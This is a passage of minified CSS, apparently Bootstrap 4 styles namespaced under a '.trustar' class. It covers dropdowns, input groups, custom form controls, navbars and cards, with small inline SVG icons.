solid;border-left:.3em solid transparent}.trustar .dropup .dropdown-toggle:empty::after{margin-left:0}.trustar .dropright .dropdown-menu{top:0;right:auto;left:100%;margin-top:0;margin-left:.125rem}.trustar .dropright .dropdown-toggle::after{display:inline-block;margin-left:.255em;vertical-align:.255em;content:\"\";border-top:.3em solid transparent;border-right:0;border-bottom:.3em solid transparent;border-left:.3em solid}.trustar .dropright .dropdown-toggle:empty::after{margin-left:0}.trustar .dropright .dropdown-toggle::after{vertical-align:0}.trustar .dropleft .dropdown-menu{top:0;right:100%;left:auto;margin-top:0;margin-right:.125rem}.trustar .dropleft .dropdown-toggle::after{display:inline-block;margin-left:.255em;vertical-align:.255em;content:\"\"}.trustar .dropleft .dropdown-toggle::after{display:none}.trustar .dropleft .dropdown-toggle::before{display:inline-block;margin-right:.255em;vertical-align:.255em;content:\"\";border-top:.3em solid transparent;border-right:.3em solid;border-bottom:.3em solid transparent}.trustar .dropleft .dropdown-toggle:empty::after{margin-left:0}.trustar .dropleft .dropdown-toggle::before{vertical-align:0}.trustar .dropdown-menu[x-placement^=\"top\"],.trustar .dropdown-menu[x-placement^=\"right\"],.trustar .dropdown-menu[x-placement^=\"bottom\"],.trustar .dropdown-menu[x-placement^=\"left\"]{right:auto;bottom:auto}.trustar .dropdown-divider{height:0;margin:.5rem 0;overflow:hidden;border-top:1px solid #e9ecef}.trustar .dropdown-item{display:block;width:100%;padding:.25rem 1.5rem;clear:both;font-weight:400;color:#212529;text-align:inherit;white-space:nowrap;background-color:transparent;border:0}.trustar .dropdown-item:first-child{border-top-left-radius:calc(.25rem - 1px);border-top-right-radius:calc(.25rem - 1px)}.trustar .dropdown-item:last-child{border-bottom-right-radius:calc(.25rem - 1px);border-bottom-left-radius:calc(.25rem - 1px)}.trustar .dropdown-item:hover,.trustar .dropdown-item:focus{color:#16181b;text-decoration:none;background-color:#f8f9fa}.trustar .dropdown-item.active,.trustar .dropdown-item:active{color:#fff;text-decoration:none;background-color:#007bff}.trustar .dropdown-item.disabled,.trustar .dropdown-item:disabled{color:#6c757d;pointer-events:none;background-color:transparent}.trustar .dropdown-menu.show{display:block}.trustar .dropdown-header{display:block;padding:.5rem 1.5rem;margin-bottom:0;font-size:.875rem;color:#6c757d;white-space:nowrap}.trustar .dropdown-item-text{display:block;padding:.25rem 1.5rem;color:#212529}.trustar .btn-group,.trustar .btn-group-vertical{position:relative;display:inline-flex;vertical-align:middle}.trustar .btn-group>.btn,.trustar .btn-group-vertical>.btn{position:relative;flex:1 1 auto}.trustar .btn-group>.btn:hover,.trustar .btn-group-vertical>.btn:hover{z-index:1}.trustar .btn-group>.btn:focus,.trustar .btn-group>.btn:active,.trustar .btn-group>.btn.active,.trustar .btn-group-vertical>.btn:focus,.trustar .btn-group-vertical>.btn:active,.trustar .btn-group-vertical>.btn.active{z-index:1}.trustar .btn-toolbar{display:flex;flex-wrap:wrap;justify-content:flex-start}.trustar .btn-toolbar .input-group{width:auto}.trustar .btn-group>.btn:not(:first-child),.trustar .btn-group>.btn-group:not(:first-child){margin-left:-1px}.trustar .btn-group>.btn:not(:last-child):not(.dropdown-toggle),.trustar .btn-group>.btn-group:not(:last-child)>.btn{border-top-right-radius:0;border-bottom-right-radius:0}.trustar .btn-group>.btn:not(:first-child),.trustar .btn-group>.btn-group:not(:first-child)>.btn{border-top-left-radius:0;border-bottom-left-radius:0}.trustar .dropdown-toggle-split{padding-right:.5625rem;padding-left:.5625rem}.trustar .dropdown-toggle-split::after,.dropup .trustar .dropdown-toggle-split::after,.dropright .trustar .dropdown-toggle-split::after{margin-left:0}.dropleft .trustar .dropdown-toggle-split::before{margin-right:0}.trustar .btn-sm+.dropdown-toggle-split,.trustar .btn-group-sm>.btn+.dropdown-toggle-split{padding-right:.375rem;padding-left:.375rem}.trustar .btn-lg+.dropdown-toggle-split,.trustar .btn-group-lg>.btn+.dropdown-toggle-split{padding-right:.75rem;padding-left:.75rem}.trustar .btn-group-vertical{flex-direction:column;align-items:flex-start;justify-content:center}.trustar .btn-group-vertical>.btn,.trustar .btn-group-vertical>.btn-group{width:100%}.trustar .btn-group-vertical>.btn:not(:first-child),.trustar .btn-group-vertical>.btn-group:not(:first-child){margin-top:-1px}.trustar .btn-group-vertical>.btn:not(:last-child):not(.dropdown-toggle),.trustar .btn-group-vertical>.btn-group:not(:last-child)>.btn{border-bottom-right-radius:0;border-bottom-left-radius:0}.trustar .btn-group-vertical>.btn:not(:first-child),.trustar .btn-group-vertical>.btn-group:not(:first-child)>.btn{border-top-left-radius:0;border-top-right-radius:0}.trustar .btn-group-toggle>.btn,.trustar .btn-group-toggle>.btn-group>.btn{margin-bottom:0}.trustar .btn-group-toggle>.btn input[type=\"radio\"],.trustar .btn-group-toggle>.btn input[type=\"checkbox\"],.trustar .btn-group-toggle>.btn-group>.btn input[type=\"radio\"],.trustar .btn-group-toggle>.btn-group>.btn input[type=\"checkbox\"]{position:absolute;clip:rect(0, 0, 0, 0);pointer-events:none}.trustar .input-group{position:relative;display:flex;flex-wrap:wrap;align-items:stretch;width:100%}.trustar .input-group>.form-control,.trustar .input-group>.form-control-plaintext,.trustar .input-group>.custom-select,.trustar .input-group>.custom-file{position:relative;flex:1 1 auto;width:1%;margin-bottom:0}.trustar .input-group>.form-control+.form-control,.trustar .input-group>.form-control+.custom-select,.trustar .input-group>.form-control+.custom-file,.trustar .input-group>.form-control-plaintext+.form-control,.trustar .input-group>.form-control-plaintext+.custom-select,.trustar .input-group>.form-control-plaintext+.custom-file,.trustar .input-group>.custom-select+.form-control,.trustar .input-group>.custom-select+.custom-select,.trustar .input-group>.custom-select+.custom-file,.trustar .input-group>.custom-file+.form-control,.trustar .input-group>.custom-file+.custom-select,.trustar .input-group>.custom-file+.custom-file{margin-left:-1px}.trustar .input-group>.form-control:focus,.trustar .input-group>.custom-select:focus,.trustar .input-group>.custom-file .custom-file-input:focus ~ .custom-file-label{z-index:3}.trustar .input-group>.custom-file .custom-file-input:focus{z-index:4}.trustar .input-group>.form-control:not(:last-child),.trustar .input-group>.custom-select:not(:last-child){border-top-right-radius:0;border-bottom-right-radius:0}.trustar .input-group>.form-control:not(:first-child),.trustar .input-group>.custom-select:not(:first-child){border-top-left-radius:0;border-bottom-left-radius:0}.trustar .input-group>.custom-file{display:flex;align-items:center}.trustar .input-group>.custom-file:not(:last-child) .custom-file-label,.trustar .input-group>.custom-file:not(:last-child) .custom-file-label::after{border-top-right-radius:0;border-bottom-right-radius:0}.trustar .input-group>.custom-file:not(:first-child) .custom-file-label{border-top-left-radius:0;border-bottom-left-radius:0}.trustar .input-group-prepend,.trustar .input-group-append{display:flex}.trustar .input-group-prepend .btn,.trustar .input-group-append .btn{position:relative;z-index:2}.trustar .input-group-prepend .btn:focus,.trustar .input-group-append .btn:focus{z-index:3}.trustar .input-group-prepend .btn+.btn,.trustar .input-group-prepend .btn+.input-group-text,.trustar .input-group-prepend .input-group-text+.input-group-text,.trustar .input-group-prepend .input-group-text+.btn,.trustar .input-group-append .btn+.btn,.trustar .input-group-append .btn+.input-group-text,.trustar .input-group-append .input-group-text+.input-group-text,.trustar .input-group-append .input-group-text+.btn{margin-left:-1px}.trustar .input-group-prepend{margin-right:-1px}.trustar .input-group-append{margin-left:-1px}.trustar .input-group-text{display:flex;align-items:center;padding:.375rem .75rem;margin-bottom:0;font-size:1rem;font-weight:400;line-height:1.5;color:#495057;text-align:center;white-space:nowrap;background-color:#e9ecef;border:1px solid #ced4da;border-radius:.25rem}.trustar .input-group-text input[type=\"radio\"],.trustar .input-group-text input[type=\"checkbox\"]{margin-top:0}.trustar .input-group-lg>.form-control:not(textarea),.trustar .input-group-lg>.custom-select{height:calc(2.875rem + 2px)}.trustar .input-group-lg>.form-control,.trustar .input-group-lg>.custom-select,.trustar .input-group-lg>.input-group-prepend>.input-group-text,.trustar .input-group-lg>.input-group-append>.input-group-text,.trustar .input-group-lg>.input-group-prepend>.btn,.trustar .input-group-lg>.input-group-append>.btn{padding:.5rem 1rem;font-size:1.25rem;line-height:1.5;border-radius:.3rem}.trustar .input-group-sm>.form-control:not(textarea),.trustar .input-group-sm>.custom-select{height:calc(1.8125rem + 2px)}.trustar .input-group-sm>.form-control,.trustar .input-group-sm>.custom-select,.trustar .input-group-sm>.input-group-prepend>.input-group-text,.trustar .input-group-sm>.input-group-append>.input-group-text,.trustar .input-group-sm>.input-group-prepend>.btn,.trustar .input-group-sm>.input-group-append>.btn{padding:.25rem .5rem;font-size:.875rem;line-height:1.5;border-radius:.2rem}.trustar .input-group-lg>.custom-select,.trustar .input-group-sm>.custom-select{padding-right:1.75rem}.trustar .input-group>.input-group-prepend>.btn,.trustar .input-group>.input-group-prepend>.input-group-text,.trustar .input-group>.input-group-append:not(:last-child)>.btn,.trustar .input-group>.input-group-append:not(:last-child)>.input-group-text,.trustar .input-group>.input-group-append:last-child>.btn:not(:last-child):not(.dropdown-toggle),.trustar .input-group>.input-group-append:last-child>.input-group-text:not(:last-child){border-top-right-radius:0;border-bottom-right-radius:0}.trustar .input-group>.input-group-append>.btn,.trustar .input-group>.input-group-append>.input-group-text,.trustar .input-group>.input-group-prepend:not(:first-child)>.btn,.trustar .input-group>.input-group-prepend:not(:first-child)>.input-group-text,.trustar .input-group>.input-group-prepend:first-child>.btn:not(:first-child),.trustar .input-group>.input-group-prepend:first-child>.input-group-text:not(:first-child){border-top-left-radius:0;border-bottom-left-radius:0}.trustar .custom-control{position:relative;display:block;min-height:1.5rem;padding-left:1.5rem}.trustar .custom-control-inline{display:inline-flex;margin-right:1rem}.trustar .custom-control-input{position:absolute;z-index:-1;opacity:0}.trustar .custom-control-input:checked ~ .custom-control-label::before{color:#fff;border-color:#007bff;background-color:#007bff}.trustar .custom-control-input:focus ~ .custom-control-label::before{box-shadow:0 0 0 .2rem rgba(0,123,255,0.25)}.trustar .custom-control-input:focus:not(:checked) ~ .custom-control-label::before{border-color:#80bdff}.trustar .custom-control-input:not(:disabled):active ~ .custom-control-label::before{color:#fff;background-color:#b3d7ff;border-color:#b3d7ff}.trustar .custom-control-input:disabled ~ .custom-control-label{color:#6c757d}.trustar .custom-control-input:disabled ~ .custom-control-label::before{background-color:#e9ecef}.trustar .custom-control-label{position:relative;margin-bottom:0;vertical-align:top}.trustar .custom-control-label::before{position:absolute;top:.25rem;left:-1.5rem;display:block;width:1rem;height:1rem;pointer-events:none;content:\"\";background-color:#fff;border:#adb5bd solid 1px}.trustar .custom-control-label::after{position:absolute;top:.25rem;left:-1.5rem;display:block;width:1rem;height:1rem;content:\"\";background-repeat:no-repeat;background-position:center center;background-size:50% 50%}.trustar .custom-checkbox .custom-control-label::before{border-radius:.25rem}.trustar .custom-checkbox .custom-control-input:checked ~ .custom-control-label::after{background-image:url(\"data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3e%3cpath fill='%23fff' d='M6.564.75l-3.59 3.612-1.538-1.55L0 4.26 2.974 7.25 8 2.193z'/%3e%3c/svg%3e\")}.trustar .custom-checkbox .custom-control-input:indeterminate ~ .custom-control-label::before{border-color:#007bff;background-color:#007bff}.trustar .custom-checkbox .custom-control-input:indeterminate ~ .custom-control-label::after{background-image:url(\"data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 4 4'%3e%3cpath stroke='%23fff' d='M0 2h4'/%3e%3c/svg%3e\")}.trustar .custom-checkbox .custom-control-input:disabled:checked ~ .custom-control-label::before{background-color:rgba(0,123,255,0.5)}.trustar .custom-checkbox .custom-control-input:disabled:indeterminate ~ .custom-control-label::before{background-color:rgba(0,123,255,0.5)}.trustar .custom-radio .custom-control-label::before{border-radius:50%}.trustar .custom-radio .custom-control-input:checked ~ .custom-control-label::after{background-image:url(\"data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='-4 -4 8 8'%3e%3ccircle r='3' fill='%23fff'/%3e%3c/svg%3e\")}.trustar .custom-radio .custom-control-input:disabled:checked ~ .custom-control-label::before{background-color:rgba(0,123,255,0.5)}.trustar .custom-switch{padding-left:2.25rem}.trustar .custom-switch .custom-control-label::before{left:-2.25rem;width:1.75rem;pointer-events:all;border-radius:.5rem}.trustar .custom-switch .custom-control-label::after{top:calc(.25rem + 2px);left:calc(-2.25rem + 2px);width:calc(1rem - 4px);height:calc(1rem - 4px);background-color:#adb5bd;border-radius:.5rem;transition:background-color 0.15s ease-in-out,border-color 0.15s ease-in-out,box-shadow 0.15s ease-in-out,-webkit-transform 0.15s ease-in-out;transition:transform 0.15s ease-in-out,background-color 0.15s ease-in-out,border-color 0.15s ease-in-out,box-shadow 0.15s ease-in-out;transition:transform 0.15s ease-in-out,background-color 0.15s ease-in-out,border-color 0.15s ease-in-out,box-shadow 0.15s ease-in-out,-webkit-transform 0.15s ease-in-out}@media screen and (prefers-reduced-motion: reduce){.trustar .custom-switch .custom-control-label::after{transition:none}}.trustar .custom-switch .custom-control-input:checked ~ .custom-control-label::after{background-color:#fff;-webkit-transform:translateX(.75rem);transform:translateX(.75rem)}.trustar .custom-switch .custom-control-input:disabled:checked ~ .custom-control-label::before{background-color:rgba(0,123,255,0.5)}.trustar .custom-select{display:inline-block;width:100%;height:calc(2.25rem + 2px);padding:.375rem 1.75rem .375rem .75rem;font-weight:400;line-height:1.5;color:#495057;vertical-align:middle;background:url(\"data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 4 5'%3e%3cpath fill='%23343a40' d='M2 0L0 2h4zm0 5L0 3h4z'/%3e%3c/svg%3e\") no-repeat right .75rem center/8px 10px;background-color:#fff;border:1px solid #ced4da;border-radius:.25rem;-webkit-appearance:none;-moz-appearance:none;appearance:none}.trustar .custom-select:focus{border-color:#80bdff;outline:0;box-shadow:0 0 0 .2rem rgba(128,189,255,0.5)}.trustar .custom-select:focus::-ms-value{color:#495057;background-color:#fff}.trustar .custom-select[multiple],.trustar .custom-select[size]:not([size=\"1\"]){height:auto;padding-right:.75rem;background-image:none}.trustar .custom-select:disabled{color:#6c757d;background-color:#e9ecef}.trustar .custom-select::-ms-expand{opacity:0}.trustar .custom-select-sm{height:calc(1.8125rem + 2px);padding-top:.25rem;padding-bottom:.25rem;padding-left:.5rem;font-size:.875rem}.trustar .custom-select-lg{height:calc(2.875rem + 2px);padding-top:.5rem;padding-bottom:.5rem;padding-left:1rem;font-size:1.25rem}.trustar .custom-file{position:relative;display:inline-block;width:100%;height:calc(2.25rem + 2px);margin-bottom:0}.trustar .custom-file-input{position:relative;z-index:2;width:100%;height:calc(2.25rem + 2px);margin:0;opacity:0}.trustar .custom-file-input:focus ~ .custom-file-label{border-color:#80bdff;box-shadow:0 0 0 .2rem rgba(0,123,255,0.25)}.trustar .custom-file-input:disabled ~ .custom-file-label{background-color:#e9ecef}.trustar .custom-file-input:lang(en) ~ .custom-file-label::after{content:\"Browse\"}.trustar .custom-file-input ~ .custom-file-label[data-browse]::after{content:attr(data-browse)}.trustar .custom-file-label{position:absolute;top:0;right:0;left:0;z-index:1;height:calc(2.25rem + 2px);padding:.375rem .75rem;font-weight:400;line-height:1.5;color:#495057;background-color:#fff;border:1px solid #ced4da;border-radius:.25rem}.trustar .custom-file-label::after{position:absolute;top:0;right:0;bottom:0;z-index:3;display:block;height:2.25rem;padding:.375rem .75rem;line-height:1.5;color:#495057;content:\"Browse\";background-color:#e9ecef;border-left:inherit;border-radius:0 .25rem .25rem 0}.trustar .custom-range{width:100%;height:calc(1rem + .4rem);padding:0;background-color:transparent;-webkit-appearance:none;-moz-appearance:none;appearance:none}.trustar .custom-range:focus{outline:none}.trustar .custom-range:focus::-webkit-slider-thumb{box-shadow:0 0 0 1px #fff,0 0 0 .2rem rgba(0,123,255,0.25)}.trustar .custom-range:focus::-moz-range-thumb{box-shadow:0 0 0 1px #fff,0 0 0 .2rem rgba(0,123,255,0.25)}.trustar .custom-range:focus::-ms-thumb{box-shadow:0 0 0 1px #fff,0 0 0 .2rem rgba(0,123,255,0.25)}.trustar .custom-range::-moz-focus-outer{border:0}.trustar .custom-range::-webkit-slider-thumb{width:1rem;height:1rem;margin-top:-.25rem;background-color:#007bff;border:0;border-radius:1rem;transition:background-color 0.15s ease-in-out,border-color 0.15s ease-in-out,box-shadow 0.15s ease-in-out;-webkit-appearance:none;appearance:none}@media screen and (prefers-reduced-motion: reduce){.trustar .custom-range::-webkit-slider-thumb{transition:none}}.trustar .custom-range::-webkit-slider-thumb:active{background-color:#b3d7ff}.trustar .custom-range::-webkit-slider-runnable-track{width:100%;height:.5rem;color:transparent;cursor:pointer;background-color:#dee2e6;border-color:transparent;border-radius:1rem}.trustar .custom-range::-moz-range-thumb{width:1rem;height:1rem;background-color:#007bff;border:0;border-radius:1rem;transition:background-color 0.15s ease-in-out,border-color 0.15s ease-in-out,box-shadow 0.15s ease-in-out;-moz-appearance:none;appearance:none}@media screen and (prefers-reduced-motion: reduce){.trustar .custom-range::-moz-range-thumb{transition:none}}.trustar .custom-range::-moz-range-thumb:active{background-color:#b3d7ff}.trustar .custom-range::-moz-range-track{width:100%;height:.5rem;color:transparent;cursor:pointer;background-color:#dee2e6;border-color:transparent;border-radius:1rem}.trustar .custom-range::-ms-thumb{width:1rem;height:1rem;margin-top:0;margin-right:.2rem;margin-left:.2rem;background-color:#007bff;border:0;border-radius:1rem;transition:background-color 0.15s ease-in-out,border-color 0.15s ease-in-out,box-shadow 0.15s ease-in-out;appearance:none}@media screen and (prefers-reduced-motion: reduce){.trustar .custom-range::-ms-thumb{transition:none}}.trustar .custom-range::-ms-thumb:active{background-color:#b3d7ff}.trustar .custom-range::-ms-track{width:100%;height:.5rem;color:transparent;cursor:pointer;background-color:transparent;border-color:transparent;border-width:.5rem}.trustar .custom-range::-ms-fill-lower{background-color:#dee2e6;border-radius:1rem}.trustar .custom-range::-ms-fill-upper{margin-right:15px;background-color:#dee2e6;border-radius:1rem}.trustar .custom-range:disabled::-webkit-slider-thumb{background-color:#adb5bd}.trustar .custom-range:disabled::-webkit-slider-runnable-track{cursor:default}.trustar .custom-range:disabled::-moz-range-thumb{background-color:#adb5bd}.trustar .custom-range:disabled::-moz-range-track{cursor:default}.trustar .custom-range:disabled::-ms-thumb{background-color:#adb5bd}.trustar .custom-control-label::before,.trustar .custom-file-label,.trustar .custom-select{transition:background-color 0.15s ease-in-out,border-color 0.15s ease-in-out,box-shadow 0.15s ease-in-out}@media screen and (prefers-reduced-motion: reduce){.trustar .custom-control-label::before,.trustar .custom-file-label,.trustar .custom-select{transition:none}}.trustar .nav{display:flex;flex-wrap:wrap;padding-left:0;margin-bottom:0;list-style:none}.trustar .nav-link{display:block;padding:.5rem 1rem}.trustar .nav-link:hover,.trustar .nav-link:focus{text-decoration:none}.trustar .nav-link.disabled{color:#6c757d;pointer-events:none;cursor:default}.trustar .nav-tabs{border-bottom:1px solid #dee2e6}.trustar .nav-tabs .nav-item{margin-bottom:-1px}.trustar .nav-tabs .nav-link{border:1px solid transparent;border-top-left-radius:.25rem;border-top-right-radius:.25rem}.trustar .nav-tabs .nav-link:hover,.trustar .nav-tabs .nav-link:focus{border-color:#e9ecef #e9ecef #dee2e6}.trustar .nav-tabs .nav-link.disabled{color:#6c757d;background-color:transparent;border-color:transparent}.trustar .nav-tabs .nav-link.active,.trustar .nav-tabs .nav-item.show .nav-link{color:#495057;background-color:#fff;border-color:#dee2e6 #dee2e6 #fff}.trustar .nav-tabs .dropdown-menu{margin-top:-1px;border-top-left-radius:0;border-top-right-radius:0}.trustar .nav-pills .nav-link{border-radius:.25rem}.trustar .nav-pills .nav-link.active,.trustar .nav-pills .show>.nav-link{color:#fff;background-color:#007bff}.trustar .nav-fill .nav-item{flex:1 1 auto;text-align:center}.trustar .nav-justified .nav-item{flex-basis:0;flex-grow:1;text-align:center}.trustar .tab-content>.tab-pane{display:none}.trustar .tab-content>.active{display:block}.trustar .navbar{position:relative;display:flex;flex-wrap:wrap;align-items:center;justify-content:space-between;padding:.5rem 1rem}.trustar .navbar>.container,.trustar .navbar>.container-fluid{display:flex;flex-wrap:wrap;align-items:center;justify-content:space-between}.trustar .navbar-brand{display:inline-block;padding-top:.3125rem;padding-bottom:.3125rem;margin-right:1rem;font-size:1.25rem;line-height:inherit;white-space:nowrap}.trustar .navbar-brand:hover,.trustar .navbar-brand:focus{text-decoration:none}.trustar .navbar-nav{display:flex;flex-direction:column;padding-left:0;margin-bottom:0;list-style:none}.trustar .navbar-nav .nav-link{padding-right:0;padding-left:0}.trustar .navbar-nav .dropdown-menu{position:static;float:none}.trustar .navbar-text{display:inline-block;padding-top:.5rem;padding-bottom:.5rem}.trustar .navbar-collapse{flex-basis:100%;flex-grow:1;align-items:center}.trustar .navbar-toggler{padding:.25rem .75rem;font-size:1.25rem;line-height:1;background-color:transparent;border:1px solid transparent;border-radius:.25rem}.trustar .navbar-toggler:hover,.trustar .navbar-toggler:focus{text-decoration:none}.trustar .navbar-toggler:not(:disabled):not(.disabled){cursor:pointer}.trustar .navbar-toggler-icon{display:inline-block;width:1.5em;height:1.5em;vertical-align:middle;content:\"\";background:no-repeat center center;background-size:100% 100%}@media (max-width: 575.98px){.trustar .navbar-expand-sm>.container,.trustar .navbar-expand-sm>.container-fluid{padding-right:0;padding-left:0}}@media (min-width: 576px){.trustar .navbar-expand-sm{flex-flow:row nowrap;justify-content:flex-start}.trustar .navbar-expand-sm .navbar-nav{flex-direction:row}.trustar .navbar-expand-sm .navbar-nav .dropdown-menu{position:absolute}.trustar .navbar-expand-sm .navbar-nav .nav-link{padding-right:.5rem;padding-left:.5rem}.trustar .navbar-expand-sm>.container,.trustar .navbar-expand-sm>.container-fluid{flex-wrap:nowrap}.trustar .navbar-expand-sm .navbar-collapse{display:flex !important;flex-basis:auto}.trustar .navbar-expand-sm .navbar-toggler{display:none}}@media (max-width: 767.98px){.trustar .navbar-expand-md>.container,.trustar .navbar-expand-md>.container-fluid{padding-right:0;padding-left:0}}@media (min-width: 768px){.trustar .navbar-expand-md{flex-flow:row nowrap;justify-content:flex-start}.trustar .navbar-expand-md .navbar-nav{flex-direction:row}.trustar .navbar-expand-md .navbar-nav .dropdown-menu{position:absolute}.trustar .navbar-expand-md .navbar-nav .nav-link{padding-right:.5rem;padding-left:.5rem}.trustar .navbar-expand-md>.container,.trustar .navbar-expand-md>.container-fluid{flex-wrap:nowrap}.trustar .navbar-expand-md .navbar-collapse{display:flex !important;flex-basis:auto}.trustar .navbar-expand-md .navbar-toggler{display:none}}@media (max-width: 991.98px){.trustar .navbar-expand-lg>.container,.trustar .navbar-expand-lg>.container-fluid{padding-right:0;padding-left:0}}@media (min-width: 992px){.trustar .navbar-expand-lg{flex-flow:row nowrap;justify-content:flex-start}.trustar .navbar-expand-lg .navbar-nav{flex-direction:row}.trustar .navbar-expand-lg .navbar-nav .dropdown-menu{position:absolute}.trustar .navbar-expand-lg .navbar-nav .nav-link{padding-right:.5rem;padding-left:.5rem}.trustar .navbar-expand-lg>.container,.trustar .navbar-expand-lg>.container-fluid{flex-wrap:nowrap}.trustar .navbar-expand-lg .navbar-collapse{display:flex !important;flex-basis:auto}.trustar .navbar-expand-lg .navbar-toggler{display:none}}@media (max-width: 1199.98px){.trustar .navbar-expand-xl>.container,.trustar .navbar-expand-xl>.container-fluid{padding-right:0;padding-left:0}}@media (min-width: 1200px){.trustar .navbar-expand-xl{flex-flow:row nowrap;justify-content:flex-start}.trustar .navbar-expand-xl .navbar-nav{flex-direction:row}.trustar .navbar-expand-xl .navbar-nav .dropdown-menu{position:absolute}.trustar .navbar-expand-xl .navbar-nav .nav-link{padding-right:.5rem;padding-left:.5rem}.trustar .navbar-expand-xl>.container,.trustar .navbar-expand-xl>.container-fluid{flex-wrap:nowrap}.trustar .navbar-expand-xl .navbar-collapse{display:flex !important;flex-basis:auto}.trustar .navbar-expand-xl .navbar-toggler{display:none}}.trustar .navbar-expand{flex-flow:row nowrap;justify-content:flex-start}.trustar .navbar-expand>.container,.trustar .navbar-expand>.container-fluid{padding-right:0;padding-left:0}.trustar .navbar-expand .navbar-nav{flex-direction:row}.trustar .navbar-expand .navbar-nav .dropdown-menu{position:absolute}.trustar .navbar-expand .navbar-nav .nav-link{padding-right:.5rem;padding-left:.5rem}.trustar .navbar-expand>.container,.trustar .navbar-expand>.container-fluid{flex-wrap:nowrap}.trustar .navbar-expand .navbar-collapse{display:flex !important;flex-basis:auto}.trustar .navbar-expand .navbar-toggler{display:none}.trustar .navbar-light .navbar-brand{color:rgba(0,0,0,0.9)}.trustar .navbar-light .navbar-brand:hover,.trustar .navbar-light .navbar-brand:focus{color:rgba(0,0,0,0.9)}.trustar .navbar-light .navbar-nav .nav-link{color:rgba(0,0,0,0.5)}.trustar .navbar-light .navbar-nav .nav-link:hover,.trustar .navbar-light .navbar-nav .nav-link:focus{color:rgba(0,0,0,0.7)}.trustar .navbar-light .navbar-nav .nav-link.disabled{color:rgba(0,0,0,0.3)}.trustar .navbar-light .navbar-nav .show>.nav-link,.trustar .navbar-light .navbar-nav .active>.nav-link,.trustar .navbar-light .navbar-nav .nav-link.show,.trustar .navbar-light .navbar-nav .nav-link.active{color:rgba(0,0,0,0.9)}.trustar .navbar-light .navbar-toggler{color:rgba(0,0,0,0.5);border-color:rgba(0,0,0,0.1)}.trustar .navbar-light .navbar-toggler-icon{background-image:url(\"data:image/svg+xml,%3csvg viewBox='0 0 30 30' xmlns='http://www.w3.org/2000/svg'%3e%3cpath stroke='rgba(0,0,0,0.5)' stroke-width='2' stroke-linecap='round' stroke-miterlimit='10' d='M4 7h22M4 15h22M4 23h22'/%3e%3c/svg%3e\")}.trustar .navbar-light .navbar-text{color:rgba(0,0,0,0.5)}.trustar .navbar-light .navbar-text a{color:rgba(0,0,0,0.9)}.trustar .navbar-light .navbar-text a:hover,.trustar .navbar-light .navbar-text a:focus{color:rgba(0,0,0,0.9)}.trustar .navbar-dark .navbar-brand{color:#fff}.trustar .navbar-dark .navbar-brand:hover,.trustar .navbar-dark .navbar-brand:focus{color:#fff}.trustar .navbar-dark .navbar-nav .nav-link{color:rgba(255,255,255,0.5)}.trustar .navbar-dark .navbar-nav .nav-link:hover,.trustar .navbar-dark .navbar-nav .nav-link:focus{color:rgba(255,255,255,0.75)}.trustar .navbar-dark .navbar-nav .nav-link.disabled{color:rgba(255,255,255,0.25)}.trustar .navbar-dark .navbar-nav .show>.nav-link,.trustar .navbar-dark .navbar-nav .active>.nav-link,.trustar .navbar-dark .navbar-nav .nav-link.show,.trustar .navbar-dark .navbar-nav .nav-link.active{color:#fff}.trustar .navbar-dark .navbar-toggler{color:rgba(255,255,255,0.5);border-color:rgba(255,255,255,0.1)}.trustar .navbar-dark .navbar-toggler-icon{background-image:url(\"data:image/svg+xml,%3csvg viewBox='0 0 30 30' xmlns='http://www.w3.org/2000/svg'%3e%3cpath stroke='rgba(255,255,255,0.5)' stroke-width='2' stroke-linecap='round' stroke-miterlimit='10' d='M4 7h22M4 15h22M4 23h22'/%3e%3c/svg%3e\")}.trustar .navbar-dark .navbar-text{color:rgba(255,255,255,0.5)}.trustar .navbar-dark .navbar-text a{color:#fff}.trustar .navbar-dark .navbar-text a:hover,.trustar .navbar-dark .navbar-text a:focus{color:#fff}.trustar .card{position:relative;display:flex;flex-direction:column;min-width:0;word-wrap:break-word;background-color:#fff;background-clip:border-box;border:1px solid rgba(0,0,0,0.125);border-radius:.25rem}.trustar .card>hr{margin-right:0;margin-left:0}.trustar .card>.list-group:first-child .list-group-item:first-child{border-top-left-radius:.25rem;border-top-right-radius:.25rem}.trustar .card>.list-group:last-child .list-group-item:last-child{border-bottom-right-radius:.25rem;border-bottom-left-radius:.25rem}.trustar .card-body{flex:1 1 auto;padding:1.25rem}.trustar .card-title{margin-bottom:.75rem}.trustar .card-subtitle{margin-top:-.375rem;margin-bottom:0}.trustar .card-text:last-child{margin-bottom:0}.trustar .card-link:hover{text-decoration:none}.trustar .card-link+.card-link{margin-left:1.25rem}.trustar .card-header{padding:.75rem 1.25rem;margin-bottom:0;color:inherit;background-color:rgba(0,0,0,0.03);border-bottom:1px solid rgba(0,0,0,0.125)}.trustar .card-header:first-child{border-radius:calc(.25rem - 1px) calc(.25rem - 1px) 0 0}.trustar .card-header+.list-group .list-group-item:first-child{border-top:0}.trustar .card-footer{padding:.75rem 1.25rem;background-color:rgba(0,0,0,0.03);border-top:1px solid rgba(0,0,0,0.125)}.trustar .card-footer:last-child{border-radius:0 0 calc(.25rem - 1px) calc(.25rem - 1px)}.trustar .card-header-tabs{margin-right:-.625rem;margin-bottom:-.75rem;margin-left:-.625rem;border-bottom:0}.trustar .card-header-pills{margin-right:-.625rem;margin-left:-.625rem}.trustar .card-img-overlay{position:absolute;top:0;right:0;bottom:0;left:0;padding:1.25rem}.trustar .card-img{width:100%;border-radius:calc(.25rem - 1px)}.trustar .card-img-top{width:100%;border-top-left-radius:calc(.25rem - 1px);border-top-right-radius:calc(.25rem - 1px)}.trustar .card-img-bottom{width:100%;border-bottom-right-radius:calc(.25rem - 1px);border-bottom-left-radius:calc(.25rem - 1px)}.trustar .card-deck{display:flex;flex-direction:column}.trustar .card-deck .card{margin-bottom:15px}@media (min-width: 576px){.trustar .card-deck{flex-flow:row wrap;margin-right:-15px;margin-left:-15px}.trustar .card-deck .card{display:flex;flex:1 0 0%;flex-direction:column;margin-right:15px;margin-bottom:0;margin-left:15px}}.trustar .card-group{display:flex;flex-direction:column}.trustar .card-group>.card{margin-bottom:15px}@media (min-width: 576px){.trustar .card-group{flex-flow:row wrap}.trustar .card-group>.card{flex:1 0 0%;margin-bottom:0}.trustar .card-group>.card+.card{margin-left:0;border-left:0}.trustar 